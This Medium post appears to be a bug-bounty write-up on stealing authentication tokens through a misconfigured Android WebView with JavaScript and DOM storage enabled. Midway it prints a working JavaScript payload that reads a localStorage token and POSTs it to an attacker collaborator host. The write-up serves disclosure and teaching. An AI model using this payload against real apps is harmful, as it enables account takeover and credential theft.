Open in app

Sign in

Write

Sign in

Steal authentication token with one-click on misconfigured WebView.

Kerolos Atef
3 min readApr 8, 2023

Howdy friend, I hope all is well at your end!

In this write-up, I will discuss an Android WebView attack that I discovered in some of the apps I was testing. Specifically, I will showcase how I was able to achieve a one-click account takeover, including but not limited to a private bug bounty program on HackerOne, by simply posting a message, comment, or post containing a link to my attacker’s website or URL. Once the Android user clicked the link, I, as the attacker, was able to steal their authentication token and their account data.

What is Webview?

WebView is a component that allows developers to customize how web pages are displayed within their apps, including support for JavaScript, cookies, and user input. It also enables the rendering of HTML, CSS, and images, and allows users to interact with web content, such as clicking links and submitting forms. Essentially, it is a browser for app content.

Details:

During my hunt on an Android app in a private bug bounty program on HackerOne, I discovered that while browsing the app, the webview executed following code that stored a user’s authentication token and account data in local storage:

javascript:window.localStorage.setItem("u", JSON.stringify({"oldToken":"Basic NjQwMDE1N2EwMTA4MzI0NTI1Y2NiOWJmOmQ3MDVkZDkzLWRjMGMtNxxxxxxxx","id":"61957b5843xxxxx","email":"secret@myemail.com","username":"0xWise","referralCode":"","hasApiAccount":false,"hasMobileAccount":true,"hasWebAccount":true,"hasPasswordSet":true}));

This code means that the localStorage value for item “u” is equal to the data in the code above. The data in the code has an “oldToken” that is equal to my account’s JWT auth token (note: the token is valid, not old).

The webview activity was set to allow setJavaScriptEnabled(true) and setDomStorageEnabled(true). This means that any link clicked and opened inside the webview can execute JavaScript and access the localStorage and sessionStorage objects without any problems.

In order to detect and/or exploit this vulnerability, I wrote the following script on my server (used Replit hosting service):


alert(window.localStorage.getItem('u'));
fetch('https://eq8u3apw7h7746qv0l5madalnct3ht5i.oastify.com/log', {
method: 'POST',
mode: 'no-cors',
body:window.localStorage.getItem('u')
});

Afterward, I navigated to the Android app and created a post that contained my Replit server’s URL (e.g. https://xss-redacted.repl.co). When the Android app user or victim clicked on the link, the results were as follows:

Impact

URLs controlled by the attacker in posts, comments, profile website, etc., can be opened inside the webview, giving the attacker access to steal the user’s data from the local storage. This data includes the user authentication token, leading to an Account Takeover (ATO).

Additionally, this vulnerability can lead to mass accounts takeover, as an attacker can easily spread their exploit URL through posts, comments, etc.

Thank you for reading!
If you have any questions, feel free to DM me on Twitter.

Pentesting
Bug Bounty
Android App Security
Mobile Security
Application Security

--

--

Kerolos Atef

Written by Kerolos Atef

29 Followers

Just noob guy wear his glasses while hacking!

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams